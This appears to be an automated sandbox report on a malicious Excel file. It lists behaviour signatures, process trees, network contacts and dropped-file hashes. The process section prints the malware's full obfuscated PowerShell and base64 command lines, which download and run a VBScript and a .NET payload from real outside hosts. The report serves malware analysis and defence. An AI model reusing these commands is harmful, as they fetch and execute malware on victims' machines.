Malware Analysis Report

2024-12-07 16:36

Sample ID 241114-c1ezkawrfm
Target 62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls
SHA256 62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1

Threat Level: Known bad

The file 62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 02:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 02:32

Reported

2024-11-14 02:34

Platform

win7-20240903-en

Max time kernel

138s

Max time network

138s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2808 wrote to memory of 2552 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe
PID 2808 wrote to memory of 2552 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe
PID 2808 wrote to memory of 2552 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe
PID 2808 wrote to memory of 2552 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe
PID 2552 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2552 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2552 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2552 wrote to memory of 2600 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2600 wrote to memory of 2360 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2600 wrote to memory of 2360 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2600 wrote to memory of 2360 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2600 wrote to memory of 2360 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2552 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WScript.exe
PID 2552 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WScript.exe
PID 2552 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WScript.exe
PID 2552 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe C:\Windows\SysWOW64\WScript.exe
PID 2716 wrote to memory of 2728 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 2728 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 2728 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 2728 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2180 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe

"C:\Windows\sYStEm32\WInDowspOWersHeLL\v1.0\PoweRsHELl.Exe" "pOwerSHeLl.ExE -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT ; iex($(IEx('[sYSTEm.teXt.eNCoDING]'+[cHar]58+[ChaR]0X3a+'UTf8.getsTRiNg([sySTem.COnVERt]'+[CHaR]0X3a+[chAr]0X3A+'frombaSE64STrIng('+[chAR]0x22+'JFNyRkRDMnFKTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iRXJkRWZJbmlUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1vbi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBob0xpVWhiSW9ELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVXSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGhzbyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3dUxwdSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInNQUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNyRkRDMnFKTTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yOS82Ni9zZWVteWJlc3RnaXJsdGhpbmtpbmdzaGVpc2Fob3RjaGlja2J1dGZ1dmsudElGIiwiJEVuVjpBUFBEQVRBXHNlZW15YmVzdGdpcmx0aGlua2luZ3NoZWlzYWhvdGNoaWNrYnV0ZnUudmJTIiwwLDApO1N0YXJULXNMZUVwKDMpO3N0YXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3RnaXJsdGhpbmtpbmdzaGVpc2Fob3RjaGlja2J1dGZ1LnZiUyI='+[cHaR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPasS -NOp -w 1 -c dEVIcECreDentIAldEplOYmEnT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\maf3vcbx.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDE0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFDDF.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdMRVJpbWFnZScrJ1VybCA9ICcrJ0RqWmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrJysnZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYnKycyYycrJzE3MzA5NDUxNzZhMDkwNGYgRGpaO0xFUndlYkNsJysnaScrJ2VudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7TEVSaW1hZ2VCeXRlcyAnKyc9IExFUndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoTEVSaW1hZ2UnKydVcmwpO0xFUmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKExFJysnUmltYWcnKydlQnl0JysnZXMpO0xFUnN0YXJ0RmxhZyA9IERqWjw8QkEnKydTRTY0X1NUQVJUPj5Ealo7TEVSZW5kRmxhZyA9IERqWjw8QkFTRTY0X0VORD4+RGpaO0xFUnN0YXJ0SW5kZXggPSBMRVJpbWFnZVRleHQuSW5kZXhPZihMRVJzdGFydEZsYWcpO0xFUmVuZEluZGV4ID0gTEVSaW1hZ2VUZXh0LkluZGV4T2YoTEVSZW5kRicrJ2xhZyk7TEVSc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIExFUmVuZEluZGV4IC1ndCBMRVJzdGFydEluZGV4O0xFUnN0YXJ0SW5kZXggKz0gTEVSc3RhcicrJ3RGbGFnLkxlbmd0aDtMRVJiYXNlNjRMZW5ndGggPSBMRVJlbmRJbmRleCAtIExFUnN0YXJ0SW5kZXg7TEVSYmFzZTY0Q29tbWFuZCA9JysnIExFUmltYWdlVGV4dC5TdWJzdHJpbmcoTEVSc3RhcnRJbmRleCwgTEVSYmEnKydzZTY0TGVuZ3RoKTtMRVJiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChMRVJiYXNlNjRDb20nKydtYW5kLlRvQ2hhckFycmF5KCkgaTFCIEZvckVhY2gtT2JqZWN0IHsgTEVSXyB9KVstMS4uLShMRVJiYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO0wnKydFUmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoTEVSYmFzZTY0UmV2ZXJzZWQpO0xFUmxvYWRlZEFzcycrJ2VtYmx5ID0gW1N5c3RlbS5SZWYnKydsZWN0JysnaW8nKyduLkFzc2VtYmx5XTo6TCcrJ29hZChMRVJjb21tYW5kQicrJ3l0ZXMpO0xFUnZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy4nKydIb21lXS5HZXRNZXRob2QoRGpaVkFJRGpaKTtMRVJ2YWlNZXRob2QuSW52b2tlKExFUm51bGwsIEAoRGpadHh0LlJSRlRSV1MvNjYvOTIuMDIyLjMuMjkxLy86cHR0aERqWiwgRGpaZGVzYXRpdmFkb0RqWiwgRGpaZGVzYXRpdicrJ2EnKydkJysnb0RqWiwgRGpaZGVzYScrJ3RpdmFkb0RqWiwgRGpaQ2FzUG9sRGpaLCBEalpkZXNhdGl2YWRvRGpaLCBEalpkZXNhdGl2YWRvRGpaLERqWmRlc2F0aXZhZG9EalosRGpaZGUnKydzYXRpdmFkb0RqWixEalpkZXNhdGl2YWRvJysnRCcrJ2paLERqWmRlc2F0aXZhZG9EalosRGpaZGVzYXRpdmFkJysnb0RqWixEaloxRGpaLERqWmRlc2F0aXYnKydhZG9EalopKTsnKS5yZVBMQWNFKChbY0hBUl02OCtbY0hBUl0xMDYrW2NIQVJdOTApLFtTdHJpbmddW2NIQVJdMzkpLnJlUExBY0UoKFtjSEFSXTc2K1tjSEFSXTY5K1tjSEFSXTgyKSxbU3RyaW5nXVtjSEFSXTM2KS5yZVBMQWNFKCdpMUInLCd8JykgfCAmICggJHNIRWxsaURbMV0rJHNIRWxMSURbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LERimage'+'Url = '+'DjZhttps://1017.filemail.com/api/file/get?filek'+'ey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c6'+'2c'+'1730945176a0904f DjZ;LERwebCl'+'i'+'ent = New-Object System.Net.WebClient;LERimageBytes '+'= LERwebClient.DownloadDa'+'ta(LERimage'+'Url);LERimageText = [System.Text.Encoding]::UTF8.GetString(LE'+'Rimag'+'eByt'+'es);LERstartFlag = DjZ<<BA'+'SE64_START>>DjZ;LERendFlag = DjZ<<BASE64_END>>DjZ;LERstartIndex = LERimageText.IndexOf(LERstartFlag);LERendIndex = LERimageText.IndexOf(LERendF'+'lag);LERstartIndex -ge 0 -an'+'d LERendIndex -gt LERstartIndex;LERstartIndex += LERstar'+'tFlag.Length;LERbase64Length = LERendIndex - LERstartIndex;LERbase64Command ='+' LERimageText.Substring(LERstartIndex, LERba'+'se64Length);LERbase64Reversed = -join (LERbase64Com'+'mand.ToCharArray() i1B ForEach-Object { LER_ })[-1..-(LERbase64C'+'ommand.Length)];L'+'ERcommandBytes = [System.Convert]::FromBase64String(LERbase64Reversed);LERloadedAss'+'embly = [System.Ref'+'lect'+'io'+'n.Assembly]::L'+'oad(LERcommandB'+'ytes);LERvaiMethod '+'= [dnlib.IO.'+'Home].GetMethod(DjZVAIDjZ);LERvaiMethod.Invoke(LERnull, @(DjZtxt.RRFTRWS/66/92.022.3.291//:ptthDjZ, DjZdesativadoDjZ, DjZdesativ'+'a'+'d'+'oDjZ, DjZdesa'+'tivadoDjZ, DjZCasPolDjZ, DjZdesativadoDjZ, DjZdesativadoDjZ,DjZdesativadoDjZ,DjZde'+'sativadoDjZ,DjZdesativado'+'D'+'jZ,DjZdesativadoDjZ,DjZdesativad'+'oDjZ,DjZ1DjZ,DjZdesativ'+'adoDjZ));').rePLAcE(([cHAR]68+[cHAR]106+[cHAR]90),[String][cHAR]39).rePLAcE(([cHAR]76+[cHAR]69+[cHAR]82),[String][cHAR]36).rePLAcE('i1B','|') | & ( $sHElliD[1]+$sHElLID[13]+'x')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 88.221.134.137:80 r10.o.lencr.org tcp
US 192.3.220.29:80 192.3.220.29 tcp
KR 221.146.204.133:443 4t.gg tcp
US 192.3.220.29:80 192.3.220.29 tcp
US 192.3.220.29:80 192.3.220.29 tcp
US 8.8.8.8:53 1017.filemail.com udp
US 142.215.209.78:443 1017.filemail.com tcp
US 142.215.209.78:443 1017.filemail.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp

Files

memory/1688-1-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

memory/1688-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2808-16-0x0000000000990000-0x0000000000992000-memory.dmp

memory/1688-17-0x00000000023F0000-0x00000000023F2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 78d6e86b532460d6aa20a01e6f65bafb
SHA1 400a85d03d57d70a88e0ce5a265d99d3c7222032
SHA256 580a78542645186ad5b5bbfc30c8dc8f82552a08de70e153f7736798ae56b4f2
SHA512 f7c1f250d3fd68b00cd96334de60d40dfbd0e5d36bfd1acdbaba922228aac2dc8013fd44df89da75122a155993cb8d570a4b6c7b36509f88802aa218055e8681

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 242d5065f90e2bc0c080bb9f6364c24c
SHA1 af40d248dbb2044abc0669d20e384838c48569a7
SHA256 6c5a2f0f49738a8fa4ce15c3fb8363d43d76a3cdc2dd6becc236af6e8a66d9ef
SHA512 acbabbf7f07be8f3a8e69f87ac56ca41719445666e153062b2d1aac68aace6bb12e58fc79822c9991eec227e3459556d8a31015ab2b56b155ae710d411520cd5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 dbd42366febab14b529a5cac9f7a8ef2
SHA1 794050d958135f690b60ff0a55604117a338c984
SHA256 76a0a60dba64de98b0a62cc85ea7374bfb4b069ee518c2f8b72353ba45d2ba79
SHA512 1b42c2328944b2c2333f63307cda81a73d9a03754a337e140ef0804eb93bcf31a4115fe32e57a69433d8349f885f0a4e302c796ee6adc6e8f86bbc6c10a3d066

C:\Users\Admin\AppData\Local\Temp\CabF48C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemebestthingswhichevermadebybestthingsgodown[1].hta

MD5 57a19193272cc7755de490dccc3be05f
SHA1 d56fce9c08083a9d81fa7fda3df780908b5fab21
SHA256 8baaf9535735d987a40639a7fe7f78e85c0a8ece06b698d6ae4b740ec63690e2
SHA512 ca5149e249b74a159f489afaba983011c9e316ee1850eff2f053c2d3ff4736bc75feb2575e71de66d3889690f50d097041041d1aaa6cc8d8476c71f403032b82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 93f1c4b43c2dc2059a6f2178529e81b0
SHA1 8f46e8c9befd7a5fd91c20688d318fe25560d877
SHA256 b04948ab214e176efb2c834369d7dbac7a9ab19dba288e57ded6f9cb3d84c273
SHA512 26a8ec7fd358aa712adca9ff6a38cca4f9b8e0a63d4b6a6dd3785647a80ca90323893c1709b9fecbdd9b4aaf0eb29d9d64e2df0734c95b09db0530940663efa8

\??\c:\Users\Admin\AppData\Local\Temp\maf3vcbx.cmdline

MD5 0a3e165a90496cc782a93ea67a87ee6b
SHA1 a6f4e8dd41a07673a2dba02dd386309181003dac
SHA256 54a94647adb74deb66bf9ad728bb8e867c87e514223b4fea2e5c97883624f778
SHA512 35942f1032082eff903e354e24e1b6337b2ed58455e9b4f3b1c80795cb972c3a4ccf3feb7d742e0b5b4fcf9332fd7eb54f95daa8610d542bd527d69009a08276

\??\c:\Users\Admin\AppData\Local\Temp\maf3vcbx.0.cs

MD5 70e878f483525e691692b50ba3aeadd0
SHA1 fa16b13bc12663af3d9a7e7dba4e027931cf9ccb
SHA256 3de2628d310015c0692133b3509877416f0c20159830c0d9ad45f10109f0bee8
SHA512 22cb839c634a7c5dc2c4b00c7c98aaa12bc4c3cc76a096e52004ede5b8f2b79e71670702f4a028b55bf2f411501dff4347cc1947fc345b32c8d957c2d9a31a05

\??\c:\Users\Admin\AppData\Local\Temp\CSCFDDF.tmp

MD5 b5a76fe4c0f7508091afb1d5532b8c55
SHA1 7c029a02bd102c8a5e4ece88805d17efbc0d70c9
SHA256 ed69485b9ce9b1b54f0a751645c0690e68971d0272caf232a7fad800100c055b
SHA512 d9b3be4021d2c1fcefc0664a52080fcc3030d11d0c65afbcb974fdaee9688429d0e4b33e634bf89a8bbd23bd82dab82f769d0936210015330574ba4f8c5c0a8d

C:\Users\Admin\AppData\Local\Temp\RESFDE0.tmp

MD5 9d6ad1d595b4ea437c13e1ac94916e37
SHA1 a3d7b69b455de984b0650bf3f2efc6ddc83459df
SHA256 c8c477209979296fbfccc5bd5e850bb402163035c0e196ede6a3b5fd5fdda647
SHA512 5a6bb923d6a906206369dd6ec7440b380583db0438192678a01b97bb35d9105a8bfe4e2ea8dcbc09b780f65d03dd3544b276075df3e92f4c85fc9e04306634bd

C:\Users\Admin\AppData\Local\Temp\maf3vcbx.dll

MD5 5797f9e629df47fda90e4647679f6205
SHA1 e2faf00dd1ffafcf17a74765d1a72e7a823696f4
SHA256 47ffe3bad8fd303da71605f4e8caea09a8bb160a1acfc6d2566d15cc4970428b
SHA512 0783b665545a39afe827e9b912a04ff16338b84e8f9acfd2c49bc5ed6870abe7bc932244160cb101938f864c73837b2ba1eca68bbaeddea41e53c6c061a4576c

C:\Users\Admin\AppData\Local\Temp\maf3vcbx.pdb

MD5 c8520981baaa0b724c44477738b32673
SHA1 3ecef25bea107b4083ad87dc7111c93f392c2e9c
SHA256 dad71dacf700bf8993c74d40e4d0c97caf8e97807b77cfc09780eec06399eb1b
SHA512 52a16ebc6074b5b5d42a6063678b49a39fd77941c2f78500e81e4192d34f4984fbd09bf9a3e850d377ff729662b437fcd3acee53c1f944747dd43b5931534d46

memory/1688-60-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seemybestgirlthinkingsheisahotchickbutfu.vbS

MD5 b93e8a9bf23aeb31964d63d631ccf365
SHA1 05b27d7f62b142a9d88c6ab89eb8ffc5f2299bd4
SHA256 75a49d9f596717af29acad09533ed873c76d71ef857aa340e47a5605b209e63f
SHA512 46e5f392f462c69158443e1c26361e950452744240638375af4e3926f0b57eb2d0f58fea63a42f998e7da1776ee49cc993d67cc32c2b2aa5244476bc95654062

\??\PIPE\srvsvc

